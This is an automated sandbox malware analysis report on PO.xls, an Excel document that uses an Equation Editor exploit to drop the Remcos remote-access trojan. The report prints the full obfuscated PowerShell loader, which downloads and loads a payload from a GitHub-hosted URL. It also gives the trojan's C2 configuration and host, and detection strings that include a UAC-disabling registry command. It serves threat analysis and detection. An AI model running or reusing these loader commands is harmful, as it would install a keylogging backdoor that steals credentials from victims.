Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
PO.xls

Overview

General Information

Sample name:PO.xls
Analysis ID:1520512
MD5:aceb61a7c1ea841efa668c8a5b3427d7
SHA1:af4fb51f1094df5ef6cea47ee227dc4f6f7c20bf
SHA256:1aa355143beeb4fdf79de0c7f79560cf62f10a394cb15d41f5fe7f8672ba8f98
Tags:xlsuser-lowmal3
Infos:

Detection

Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for dropped file
Contains functionality to bypass UAC (CMSTPLUA)
Detected Remcos RAT
Found malware configuration
Malicious sample detected (through community Yara rule)
Microsoft Office launches external ms-search protocol handler (WebDAV)
Multi AV Scanner detection for submitted file
Sigma detected: EQNEDT32.EXE connecting to internet
Sigma detected: File Dropped By EQNEDT32EXE
Sigma detected: Remcos
Suricata IDS alerts for network traffic
Yara detected Remcos RAT
Yara detected UAC Bypass using CMSTP
Bypasses PowerShell execution policy
C2 URLs / IPs found in malware configuration
Connects to many ports of the same IP (likely port scanning)
Contains functionality to register a low level keyboard hook
Contains functionality to steal Chrome passwords or cookies
Contains functionality to steal Firefox passwords or cookies
Contains functionalty to change the wallpaper
Delayed program exit found
Document exploit detected (process start blacklist hit)
Excel sheet contains many unusual embedded objects
Injects a PE file into a foreign processes
Installs a global keyboard hook
Machine Learning detection for sample
Microsoft Office drops suspicious files
Obfuscated command line found
Office drops RTF file
Office equation editor establishes network connection
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Office viewer loads remote template
Sigma detected: Base64 Encoded PowerShell Command Detected
Sigma detected: Equation Editor Network Connection
Sigma detected: HackTool - CrackMapExec PowerShell Obfuscation
Sigma detected: Potential PowerShell Command Line Obfuscation
Sigma detected: Potential PowerShell Obfuscation Via Reversed Commands
Sigma detected: PowerShell Base64 Encoded FromBase64String Cmdlet
Sigma detected: Suspicious Microsoft Office Child Process
Sigma detected: WScript or CScript Dropper
Suspicious execution chain found
Suspicious powershell command line found
Uses dynamic DNS services
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes to foreign memory regions
Wscript starts Powershell (via cmd or directly)
Abnormal high CPU Usage
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Contains functionality for read data from the clipboard
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to download and launch executables
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to enumerate running services
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to modify clipboard data
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Document contains Microsoft Equation 3.0 OLE entries
Document contains embedded VBA macros
Document misses a certain OLE stream usually present in this Microsoft Office document type
Enables debug privileges
Extensive use of GetProcAddress (often used to hide API calls)
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Office Equation Editor has been started
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries the volume information (name, serial number etc) of a device
Sigma detected: Change PowerShell Policies to an Insecure Level
Sigma detected: Excel Network Connections
Sigma detected: Suspicious Office Outbound Connections
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Yara detected Keylogger Generic
Yara signature match

Classification

  • System is w7x64
  • EXCEL.EXE (PID: 3208 cmdline: "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding MD5: D53B85E21886D2AF9815C377537BCAC3)
    • WINWORD.EXE (PID: 3528 cmdline: "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" -Embedding MD5: 9EE74859D22DAE61F1750B3A1BACB6F5)
      • EQNEDT32.EXE (PID: 3820 cmdline: "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • wscript.exe (PID: 3896 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\nicepicturewithyourebodygreen.vBS" MD5: 979D74799EA6C8B8167869A68DF5204A)
      • powershell.exe (PID: 3940 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxMSWRbMV0rJFNIRUxsaWRbMTNdKyd4JykgKCgnZzZXdXJsID0gZicrJ3E0JysnaHQnKyd0JysncCcrJ3M6Ly8nKydyYScrJ3cuZycrJ2l0aHVidXNlcmNvbnRlbicrJ3QuY28nKydtLycrJ05vRGV0ZWN0T24nKycvTm9EZScrJ3QnKydlJysnY3QnKydPJysnbi9yZScrJ2ZzL2gnKydlJysnYWRzL20nKydhaW4nKycvRGV0YWgnKydOb3RoLVYnKycuJysndHh0ZnE0OyBnNldiJysnYScrJ3NlNicrJzRDb250ZScrJ250ICcrJz0gJysnKE5ldy1PJysnYmplY3QgJysnU3knKydzdGVtLk5ldC4nKydXZWJDbGllJysnbicrJ3QpLicrJ0RvdycrJ24nKydsbycrJ2FkU3RyJysnaW5nKGc2V3VyJysnbCk7IGcnKyc2JysnV2InKydpJysnbmFyeScrJ0NvbnQnKydlbnQgPSBbU3knKydzdGVtLicrJ0NvbnZlcicrJ3RdOicrJzpGcm8nKydtQicrJ2FzZScrJzY0U3RyJysnaW5nJysnKGcnKyc2JysnV2JhJysnc2U2NCcrJ0NvbnRlbicrJ3QpOycrJyBnNldhc3NlbWJsJysneSA9IFtSZWYnKydsZScrJ2N0aW9uLkFzcycrJ2UnKydtYmx5XTo6TG9hZCcrJyhnNlcnKydiaW5hcnlDbycrJ250ZW50JysnKTsgJysnW2RuJysnbGliLklPLicrJ0hvbWUnKyddJysnOjpWQUkocicrJ2F5dHgnKyd0LicrJ1JFRVdSLycrJzA1NScrJy84NCcrJzEuMjMuJysnOCcrJzYxLicrJzQwJysnMScrJy8vOnB0dGhyYXksICcrJ3JheScrJ2Rlc2F0aXYnKydhJysnZCcrJ29yJysnYXknKycsICcrJ3JheWRlcycrJ2F0JysnaXZhZG9yJysnYXksIHJheWRlJysncycrJ2EnKyd0aXZhZCcrJ29yYXksICcrJ3InKydheVInKydlZ0FzbXJheScrJywgcmEnKyd5cmEnKyd5LHJheXJheSknKS5yRVBMQUNlKChbY0hBcl0xMTQrW2NIQXJdOTcrW2NIQXJdMTIxKSxbc1RyaU5HXVtjSEFyXTM0KS5yRVBMQUNlKChbY0hBcl0xMDIrW2NIQXJdMTEzK1tjSEFyXTUyKSxbc1RyaU5HXVtjSEFyXTM5KS5yRVBMQUNlKChbY0hBcl0xMDMrW2NIQXJdNTQrW2NIQXJdODcpLFtzVHJpTkddW2NIQXJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD MD5: EB32C070E658937AA9FA9F3AE629B2B8)
        • powershell.exe (PID: 4036 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $SHElLId[1]+$SHELlid[13]+'x') (('g6Wurl = f'+'q4'+'ht'+'t'+'p'+'s://'+'ra'+'w.g'+'ithubuserconten'+'t.co'+'m/'+'NoDetectOn'+'/NoDe'+'t'+'e'+'ct'+'O'+'n/re'+'fs/h'+'e'+'ads/m'+'ain'+'/Detah'+'Noth-V'+'.'+'txtfq4; g6Wb'+'a'+'se6'+'4Conte'+'nt '+'= '+'(New-O'+'bject '+'Sy'+'stem.Net.'+'WebClie'+'n'+'t).'+'Dow'+'n'+'lo'+'adStr'+'ing(g6Wur'+'l); g'+'6'+'Wb'+'i'+'nary'+'Cont'+'ent = [Sy'+'stem.'+'Conver'+'t]:'+':Fro'+'mB'+'ase'+'64Str'+'ing'+'(g'+'6'+'Wba'+'se64'+'Conten'+'t);'+' g6Wassembl'+'y = [Ref'+'le'+'ction.Ass'+'e'+'mbly]::Load'+'(g6W'+'binaryCo'+'ntent'+'); '+'[dn'+'lib.IO.'+'Home'+']'+'::VAI(r'+'aytx'+'t.'+'REEWR/'+'055'+'/84'+'1.23.'+'8'+'61.'+'40'+'1'+'//:ptthray, '+'ray'+'desativ'+'a'+'d'+'or'+'ay'+', '+'raydes'+'at'+'ivador'+'ay, rayde'+'s'+'a'+'tivad'+'oray, '+'r'+'ayR'+'egAsmray'+', ra'+'yra'+'y,rayray)').rEPLACe(([cHAr]114+[cHAr]97+[cHAr]121),[sTriNG][cHAr]34).rEPLACe(([cHAr]102+[cHAr]113+[cHAr]52),[sTriNG][cHAr]39).rEPLACe(([cHAr]103+[cHAr]54+[cHAr]87),[sTriNG][cHAr]36) )" MD5: EB32C070E658937AA9FA9F3AE629B2B8)
          • RegAsm.exe (PID: 364 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
          • RegAsm.exe (PID: 3044 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" MD5: 8FE9545E9F72E460723F484C304314AD)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Remcos, RemcosRATRemcos (acronym of Remote Control & Surveillance Software) is a commercial Remote Access Tool to remotely control computers.Remcos is advertised as legitimate software which can be used for surveillance and penetration testing purposes, but has been used in numerous hacking campaigns.Remcos, once installed, opens a backdoor on the computer, granting full access to the remote user.Remcos is developed by the cybersecurity company BreakingSecurity.
  • APT33
  • The Gorgon Group
  • UAC-0050
https://malpedia.caad.fkie.fraunhofer.de/details/win.remcos
{"Host:Port:Password": "ramcxx.duckdns.org:50312:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Enable", "Install path": "Application path", "Copy file": "remcos.exe", "Startup value": "Disable", "Hide file": "Disable", "Mutex": "Rmc-M3P7YT", "Keylog flag": "1", "Keylog path": "Application path", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5"}
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\C899BC08.docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x125d:$obj2: \objdata
  • 0x1273:$obj3: \objupdate
  • 0x123a:$obj6: \objlink
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\enwegetbacktoenitrefeaturestounderstandhowmuchgreatsheisverycutergirlwithentierthingstobegreatandfineforeverythigngetbackwithnewsystem_______veryniceperson[1].docINDICATOR_RTF_MalVer_ObjectsDetects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.ditekSHen
  • 0x125d:$obj2: \objdata
  • 0x1273:$obj3: \objupdate
  • 0x123a:$obj6: \objlink
C:\ProgramData\remcos\logs.datJoeSecurity_RemcosYara detected Remcos RATJoe Security
    SourceRuleDescriptionAuthorStrings
    00000010.00000002.1027741834.000000000239E000.00000004.00000010.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
      00000010.00000002.1027592173.0000000000891000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
        00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
          00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
            00000010.00000002.1027400715.0000000000400000.00000040.00000400.00020000.00000000.sdmpJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
              Click to see the 22 entries
              SourceRuleDescriptionAuthorStrings
              16.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_Keylogger_GenericYara detected Keylogger GenericJoe Security
                16.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_RemcosYara detected Remcos RATJoe Security
                  16.2.RegAsm.exe.400000.0.raw.unpackJoeSecurity_UACBypassusingCMSTPYara detected UAC Bypass using CMSTPJoe Security
                    16.2.RegAsm.exe.400000.0.raw.unpackWindows_Trojan_Remcos_b296e965unknownunknown
                    • 0x6c4b8:$a1: Remcos restarted by watchdog!
                    • 0x6ca30:$a3: %02i:%02i:%02i:%03i
                    16.2.RegAsm.exe.400000.0.raw.unpackREMCOS_RAT_variantsunknownunknown
                    • 0x6650c:$str_a1: C:\Windows\System32\cmd.exe
                    • 0x66488:$str_a3: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x66488:$str_a4: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWOR
                    • 0x66988:$str_a5: \AppData\Local\Google\Chrome\User Data\Default\Login Data
                    • 0x671b8:$str_b1: CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)
                    • 0x6657c:$str_b2: Executing file:
                    • 0x675fc:$str_b3: GetDirectListeningPort
                    • 0x66fa8:$str_b4: Set fso = CreateObject("Scripting.FileSystemObject")
                    • 0x67128:$str_b7: \update.vbs
                    • 0x665a4:$str_b9: Downloaded file:
                    • 0x66590:$str_b10: Downloading file:
                    • 0x66634:$str_b12: Failed to upload file:
                    • 0x675c4:$str_b13: StartForward
                    • 0x675e4:$str_b14: StopForward
                    • 0x67080:$str_b15: fso.DeleteFile "
                    • 0x67014:$str_b16: On Error Resume Next
                    • 0x670b0:$str_b17: fso.DeleteFolder "
                    • 0x66624:$str_b18: Uploaded file:
                    • 0x665e4:$str_b19: Unable to delete:
                    • 0x67048:$str_b20: while fso.FileExists("
                    • 0x66ac1:$str_c0: [Firefox StoredLogins not found]
                    Click to see the 18 entries

                    Exploits

                    barindex
                    Source: Network ConnectionAuthor: Joe Security: Data: DestinationIp: 104.168.32.148, DestinationIsIpv6: false, DestinationPort: 80, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3820, Protocol: tcp, SourceIp: 192.168.2.22, SourceIsIpv6: false, SourcePort: 49172
                    Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 3820, TargetFilename: C:\Users\user\AppData\Roaming\nicepicturewithyourebodygreen.vBS

                    System Summary

                    barindex
                    Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxMSWRbMV0rJFNIRUxsaWRbMTNdKyd4JykgKCgnZzZXdXJsID0gZicrJ3E0JysnaHQnKyd0JysncCcrJ3M6Ly8nKydyYScrJ3cuZycrJ2l0aHVidXNlcmNvbnRlbicrJ3QuY28nKydtLycrJ05vRGV0ZWN0T24nKycvTm9EZScrJ3QnKydlJysnY3QnKydPJysnbi9yZScrJ2ZzL2gnKydlJysnYWRzL20nKydhaW4nKycvRGV0YWgnKydOb3RoLVYnKycuJysndHh0ZnE0OyBnNldiJysnYScrJ3NlNicrJzRDb250ZScrJ250ICcrJz0gJysnKE5ldy1PJysnYmplY3QgJysnU3knKydzdGVtLk5ldC4nKydXZWJDbGllJysnbicrJ3QpLicrJ0RvdycrJ24nKydsbycrJ2FkU3RyJysnaW5nKGc2V3VyJysnbCk7IGcnKyc2JysnV2InKydpJysnbmFyeScrJ0NvbnQnKydlbnQgPSBbU3knKydzdGVtLicrJ0NvbnZlcicrJ3RdOicrJzpGcm8nKydtQicrJ2FzZScrJzY0U3RyJysnaW5nJysnKGcnKyc2JysnV2JhJysnc2U2NCcrJ0NvbnRlbicrJ3QpOycrJyBnNldhc3NlbWJsJysneSA9IFtSZWYnKydsZScrJ2N0aW9uLkFzcycrJ2UnKydtYmx5XTo6TG9hZCcrJyhnNlcnKydiaW5hcnlDbycrJ250ZW50JysnKTsgJysnW2RuJysnbGliLklPLicrJ0hvbWUnKyddJysnOjpWQUkocicrJ2F5dHgnKyd0LicrJ1JFRVdSLycrJzA1NScrJy84NCcrJzEuMjMuJysnOCcrJzYxLicrJzQwJysnMScrJy8vOnB0dGhyYXksICcrJ3JheScrJ2Rlc2F0aXYnKydhJysnZCcrJ29yJysnYXknKycsICcrJ3JheWRlcycrJ2F0JysnaXZhZG9yJysnYXksIHJheWRlJysncycrJ2EnKyd0aXZhZCcrJ29yYXksICcrJ3InKydheVInKydlZ0FzbXJheScrJywgcmEnKyd5cmEnKyd5LHJheXJheSknKS5yRVBMQUNlKChbY0hBcl0xMTQrW2NIQXJdOTcrW2NIQXJdMTIxKSxbc1RyaU5HXVtjSEFyXTM0KS5yRVBMQUNlKChbY0hBcl0xMDIrW2NIQXJdMTEzK1tjSEFyXTUyKSxbc1RyaU5HXVtjSEFyXTM5KS5yRVBMQUNlKChbY0hBcl0xMDMrW2NIQXJdNTQrW2NIQXJdODcpLFtzVHJpTkddW2NIQXJdMzYpICk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxMSWRbMV0rJFNIRUxsaWRbMTNdKyd4JykgKCgnZzZXdXJsID0gZicrJ3E0JysnaHQnKyd0JysncCcrJ3M6Ly8nKydyYScrJ3cuZycrJ2l0aHVidXNlcmNvbnRlbicrJ3QuY28nKydtLycrJ05vRGV0ZWN0T24nKycvTm9EZScrJ3QnKydlJysnY3QnKydPJysnbi9yZScrJ2ZzL2gnKydlJysnYWRzL20nKydhaW4nKycvRGV0YWgnKydOb3RoLVYnKycuJysndHh0ZnE0OyBnNldiJysnYScrJ3NlNicrJzRDb250ZScrJ250ICcrJz0gJysnKE5ldy1PJysnYmplY3QgJysnU3knKydzdGVtLk5ldC4nKydXZWJDbGllJysnbicrJ3QpLicrJ0RvdycrJ24nKydsbycrJ2FkU3RyJysnaW5nKGc2V3VyJysnbCk7IGcnKyc2JysnV2InKydpJysnbmFyeScrJ0NvbnQnKydlbnQgPSBbU3knKydzdGVtLicrJ0NvbnZlcicrJ3RdOicrJzpGcm8nKydtQicrJ2FzZScrJzY0U3RyJysnaW5nJysnKGcnKyc2JysnV2JhJysnc2U2NCcrJ0NvbnRlbicrJ3QpOycrJyBnNldhc3NlbWJsJysneSA9IFtSZWYnKydsZScrJ2N0aW9uLkFzcycrJ2UnKydtYmx5XTo6TG9hZCcrJyhnNlcnKydiaW5hcnlDbycrJ250ZW50JysnKTsgJysnW2RuJysnbGliLklPLicrJ0hvbWUnKyddJysnOjpWQUkocicrJ2F5dHgnKyd0LicrJ1JFRVdSLycrJzA1NScrJy84NCcrJzEuMjMuJysnOCcrJzYxLicrJzQwJysnMScrJy8vOnB0dGhyYXksICcrJ3JheScrJ2Rlc2F0aXYnKydhJysnZCcrJ29yJysnYXknKycsICcrJ3JheWRlcycrJ2F0JysnaXZhZG9yJysnYXksIHJheWRlJysncycrJ2EnKyd0aXZhZCcrJ29yYXksICcrJ3InKydheVInKydlZ0FzbXJheScrJywgcmEnKyd5cmEnKyd5LHJheXJheSknKS5yRVBMQUNlKChbY0hBcl0xMTQrW2NIQXJdOTcrW2NIQXJdMTIxKSxbc1RyaU5HXVtjSEFyXTM0KS5yRVBMQUNlKChbY0hBcl0xMDIrW2NIQXJdMTEzK1tjSEFyXTUyKSxbc1RyaU5HXVtjSEFyXTM5KS5yRVBMQUNlKChbY0hBcl0xMDMrW2NIQXJd
                    Source: Network ConnectionAuthor: Max Altgelt (Nextron Systems): Data: DestinationIp: 192.168.2.22, DestinationIsIpv6: false, DestinationPort: 49172, EventID: 3, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, Initiated: true, ProcessId: 3820, Protocol: tcp, SourceIp: 104.168.32.148, SourceIsIpv6: false, SourcePort: 80
                    Source: Process startedAuthor: Thomas Patzke: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $SHElLId[1]+$SHELlid[13]+'x') (('g6Wurl = f'+'q4'+'ht'+'t'+'p'+'s://'+'ra'+'w.g'+'ithubuserconten'+'t.co'+'m/'+'NoDetectOn'+'/NoDe'+'t'+'e'+'ct'+'O'+'n/re'+'fs/h'+'e'+'ads/m'+'ain'+'/Detah'+'Noth-V'+'.'+'txtfq4; g6Wb'+'a'+'se6'+'4Conte'+'nt '+'= '+'(New-O'+'bject '+'Sy'+'stem.Net.'+'WebClie'+'n'+'t).'+'Dow'+'n'+'lo'+'adStr'+'ing(g6Wur'+'l); g'+'6'+'Wb'+'i'+'nary'+'Cont'+'ent = [Sy'+'stem.'+'Conver'+'t]:'+':Fro'+'mB'+'ase'+'64Str'+'ing'+'(g'+'6'+'Wba'+'se64'+'Conten'+'t);'+' g6Wassembl'+'y = [Ref'+'le'+'ction.Ass'+'e'+'mbly]::Load'+'(g6W'+'binaryCo'+'ntent'+'); '+'[dn'+'lib.IO.'+'Home'+']'+'::VAI(r'+'aytx'+'t.'+'REEWR/'+'055'+'/84'+'1.23.'+'8'+'61.'+'40'+'1'+'//:ptthray, '+'ray'+'desativ'+'a'+'d'+'or'+'ay'+', '+'raydes'+'at'+'ivador'+'ay, rayde'+'s'+'a'+'tivad'+'oray, '+'r'+'ayR'+'egAsmray'+', ra'+'yra'+'y,rayray)').rEPLACe(([cHAr]114+[cHAr]97+[cHAr]121),[sTriNG][cHAr]34).rEPLACe(([cHAr]102+[cHAr]113+[cHAr]52),[sTriNG][cHAr]39).rEPLACe(([cHAr]103+[cHAr]54+[cHAr]87),[sTriNG][cHAr]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $SHElLId[1]+$SHELlid[13]+'x') (('g6Wurl = f'+'q4'+'ht'+'t'+'p'+'s://'+'ra'+'w.g'+'ithubuserconten'+'t.co'+'m/'+'NoDetectOn'+'/NoDe'+'t'+'e'+'ct'+'O'+'n/re'+'fs/h'+'e'+'ads/m'+'ain'+'/Detah'+'Noth-V'+'.'+'txtfq4; g6Wb'+'a'+'se6'+'4Conte'+'nt '+'= '+'(New-O'+'bject '+'Sy'+'stem.Net.'+'WebClie'+'n'+'t).'+'Dow'+'n'+'lo'+'adStr'+'ing(g6Wur'+'l); g'+'6'+'Wb'+'i'+'nary'+'Cont'+'ent = [Sy'+'stem.'+'Conver'+'t]:'+':Fro'+'mB'+'ase'+'64Str'+'ing'+'(g'+'6'+'Wba'+'se64'+'Conten'+'t);'+' g6Wassembl'+'y = [Ref'+'le'+'ction.Ass'+'e'+'mbly]::Load'+'(g6W'+'binaryCo'+'ntent'+'); '+'[dn'+'lib.IO.'+'Home'+']'+'::VAI(r'+'aytx'+'t.'+'REEWR/'+'055'+'/84'+'1.23.'+'8'+'61.'+'40'+'1'+'//:ptthray, '+'ray'+'desativ'+'a'+'d'+'or'+'ay'+', '+'raydes'+'at'+'ivador'+'ay, rayde'+'s'+'a'+'tivad'+'oray, '+'r'+'ayR'+'egAsmray'+', ra'+'yra'+'y,rayray)').rEPLACe(([cHAr]114+[cHAr]97+[cHAr]121),[sTriNG][cHAr]34).rEPLACe(([cHAr]102+[cHAr]113+[cHAr]52),[sTriNG][cHAr]39).rEPLACe(([cHAr]103+[cHAr]54+[cHAr]87),[sTriNG][cHAr]36) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNIRWxMSWRbMV0rJFNIRUxsaWRbMTNdKyd4JykgKCgnZzZXdXJsID0gZicrJ3E0JysnaHQnKyd0JysncCcrJ3M6Ly8nKydyYScrJ3cuZycrJ2l0aHVidXNlcmNvbnRlbicrJ3QuY28nKydtLycrJ05vRGV0ZWN0T24nKycvTm9EZScrJ3QnKydlJysnY3QnKydPJysnbi9yZScrJ2ZzL2gnKydlJysnYWRzL20nKydhaW4nKycvRGV0YWgnKydOb3RoLVYnKycuJysndHh0ZnE0OyBnNldiJysnYScrJ3NlNicrJzRDb250ZScrJ250ICcrJz0gJysnKE5ldy1PJysnYmp
                    Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $SHElLId[1]+$SHELlid[13]+'x') (('g6Wurl = f'+'q4'+'ht'+'t'+'p'+'s://'+'ra'+'w.g'+'ithubuserconten'+'t.co'+'m/'+'NoDetectOn'+'/NoDe'+'t'+'e'+'ct'+'O'+'n/re'+'fs/h'+'e'+'ads/m'+'ain'+'/Detah'+'Noth-V'+'.'+'txtfq4; g6Wb'+'a'+'se6'+'4Conte'+'nt '+'= '+'(New-O'+'bject '+'Sy'+'stem.Net.'+'WebClie'+'n'+'t).'+'Dow'+'n'+'lo'+'adStr'+'ing(g6Wur'+'l); g'+'6'+'Wb'+'i'+'nary'+'Cont'+'ent = [Sy'+'stem.'+'Conver'+'t]:'+':Fro'+'mB'+'ase'+'64Str'+'ing'+'(g'+'6'+'Wba'+'se64'+'Conten'+'t);'+' g6Wassembl'+'y = [Ref'+'le'+'ction.Ass'+'e'+'mbly]::Load'+'(g6W'+'binaryCo'+'ntent'+'); '+'[dn'+'lib.IO.'+'Home'+']'+'::VAI(r'+'aytx'+'t.'+'REEWR/'+'055'+'/84'+'1.23.'+'8'+'61.'+'40'+'1'+'//:ptthray, '+'ray'+'desativ'+'a'+'d'+'or'+'ay'+', '+'raydes'+'at'+'ivador'+'ay, rayde'+'s'+'a'+'tivad'+'oray, '+'r'+'ayR'+'egAsmray'+', ra'+'yra'+'y,rayray)').rEPLACe(([cHAr]114+[cHAr]97+[cHAr]121),[sTriNG][cHAr]34).rEPLACe(([cHAr]102+[cHAr]113+[cHAr]52),[sTriNG][cHAr]39).rEPLACe(([cHAr]103+[cHAr]54+[cHAr]87),[sTriNG][cHAr]36) )", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $SHElLId[1]+$SHELlid[13]+'x') (('g6Wurl = f'+'q4'+'ht'+'t'+'p'+'s://'+'ra'+'w.g'+'ithubuserconten'+'t.co'+'m/'+'NoDetectOn'+'/NoDe'+'t'+'e'+'ct'+'O'+'n/re'+'fs/h'+'e'+'ads/m'+'ain'+'/Detah'+'Noth-V'+'.'+'txtfq4; g6Wb'+'a'+'se6'+'4Conte'+'nt '+'= '+'(New-O'+'bject '+'Sy'+'stem.Net.'+'WebClie'+'n'+'t).'+'Dow'+'n'+'lo'+'adStr'+'ing(g6Wur'+'l); g'+'6'+'Wb'+'i'+'nary'+'Cont'+'ent = [Sy'+'stem.'+'Conver'+'t]:'+':Fro'+'mB'+'ase'+'64Str'+'ing'+'(g'+'6'+'Wba'+'se64'+'Conten'+'t);'+' g6Wassembl'+'y = [Ref'+'le'+'ction.Ass'+'e'+'mbly]::Load'+'(g6W'+'binaryCo'+'ntent'+'); '+'[dn'+'lib.IO.'+'Home'+']'+'::VAI(r'+'aytx'+'t.'+'REEWR/'+'055'+'/84'+'1.23.'+'8'+'61.'+'40'+'1'+'//:ptthray, '+'ray'+'desativ'+'a'+'d'+'or'+'ay'+', '+'raydes'+'at'+'ivador'+'ay, rayde'+'s'+'a'+'tivad'+'oray, '+'r'+'ayR'+'egAsmray'+', ra'+'yra'+'y,rayray)').rEPLACe(([cHAr]114+[cHAr]97+[cHAr]121),[sTriNG][cHAr]34).rEPLACe(([cHAr]102+[cHAr]113+[cHAr]52),[sTriNG][cHAr]39).rEPLACe(([cHAr]103+[cHAr]54+[cHAr]87),[sTriNG][cHAr]36) )", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: 